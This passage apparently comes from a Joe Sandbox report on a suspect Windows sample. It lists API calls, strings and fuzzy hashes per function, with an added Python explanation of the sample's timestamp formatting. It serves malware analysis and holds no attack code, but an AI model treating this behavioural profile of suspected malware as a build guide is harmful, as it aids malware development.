                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                • String ID:
                                                • API String ID: 3771399671-0
                                                • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                • String ID:
                                                • API String ID: 2156557900-0
                                                • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                • API String ID: 0-1603158881
                                                • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                APIs
                                                • CreateMenu.USER32 ref: 00448603
                                                • SetMenu.USER32(?,00000000), ref: 00448613
                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                • IsMenu.USER32(?), ref: 004486AB
                                                • CreatePopupMenu.USER32 ref: 004486B5
                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                • DrawMenuBar.USER32 ref: 004486F5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                • String ID: 0
                                                • API String ID: 161812096-4108050209
                                                • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                APIs
                                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                • String ID:
                                                • API String ID: 978794511-0
                                                • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ClearVariant
                                                • String ID:
                                                • API String ID: 1473721057-0
                                                • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _memmove$_memcmp
                                                • String ID: '$\$h
                                                • API String ID: 2205784470-1303700344
                                                • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                APIs
                                                • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                • VariantClear.OLEAUT32 ref: 0045EA6D
                                                • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                • __swprintf.LIBCMT ref: 0045EC33
                                                • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                Strings
                                                • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                • String ID: %4d%02d%02d%02d%02d%02d
                                                • API String ID: 2441338619-1568723262
                                                • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
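The record above pairs VariantTimeToSystemTime with the format string %4d%02d%02d%02d%02d%02d (xref 0045EC2D), i.e. it renders a COM DATE as a YYYYMMDDHHMMSS string. A DATE is a double counting days from 30 December 1899, with the fractional part as the time of day; for negative values the integer part still selects the day and the magnitude of the fraction the time, which plain addition gets wrong by a day. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it reimplements that conversion and formats the result with the same format string, so a timestamp of this shape seen elsewhere can be read back. Rounding to the nearest whole second is an assumption about VariantTimeToSystemTime's behaviour, and the input values are constructed.

```python
import math
from datetime import datetime, timedelta

OLE_EPOCH = datetime(1899, 12, 30)   # day 0 of the COM/OLE DATE type


def variant_time_to_systemtime(vt: float) -> datetime:
    """Convert a COM DATE (days since 1899-12-30) to a datetime.

    The integer part selects the day and the fraction the time of day.
    Negative DATEs count days backwards, but the time of day is still
    the magnitude of the fraction, so -1.5 is 1899-12-29 12:00:00, not
    1899-12-28 12:00:00 as OLE_EPOCH + timedelta(days=-1.5) would give.
    """
    days = math.trunc(vt)
    frac = abs(vt - days)
    # Assumption: round to the nearest second; sub-second remainder is dropped,
    # matching the whole-second SYSTEMTIME fields used by the format string.
    seconds = int(frac * 86400 + 0.5)
    return OLE_EPOCH + timedelta(days=days, seconds=seconds)


def format_timestamp(vt: float) -> str:
    """Render a DATE the way the sample's __swprintf call does."""
    t = variant_time_to_systemtime(vt)
    return "%4d%02d%02d%02d%02d%02d" % (t.year, t.month, t.day,
                                        t.hour, t.minute, t.second)


def parse_timestamp(s: str) -> datetime:
    """Inverse of format_timestamp, for reading such strings out of captured data."""
    return datetime.strptime(s, "%Y%m%d%H%M%S")


if __name__ == "__main__":
    for vt in (45546.5, -1.5, 0.0):          # constructed sample inputs
        print(vt, "->", format_timestamp(vt))
```

The negative-value branch matters only for dates before 1899, but it is the part of the DATE type most reimplementations get wrong, and it is why the code truncates and takes the absolute value of the fraction instead of adding the raw double to the epoch.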
                                                APIs
                                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Interlocked$DecrementIncrement$Sleep
                                                • String ID: @COM_EVENTOBJ
                                                • API String ID: 327565842-2228938565
                                                • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                APIs
                                                • VariantClear.OLEAUT32(?), ref: 0047031B
                                                • VariantClear.OLEAUT32(?), ref: 0047044F
                                                • VariantInit.OLEAUT32(?), ref: 004704A3
                                                • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                • VariantClear.OLEAUT32(?), ref: 00470516
                                                  • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                  • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                • String ID: H
                                                • API String ID: 3613100350-2852464175
                                                • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                APIs
                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                • DestroyWindow.USER32(?), ref: 00426F50
                                                • UnregisterHotKey.USER32(?), ref: 00426F77
                                                • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                • String ID: close all
                                                • API String ID: 4174999648-3243417748
                                                • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                APIs
                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                • String ID:
                                                • API String ID: 1291720006-3916222277
                                                • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
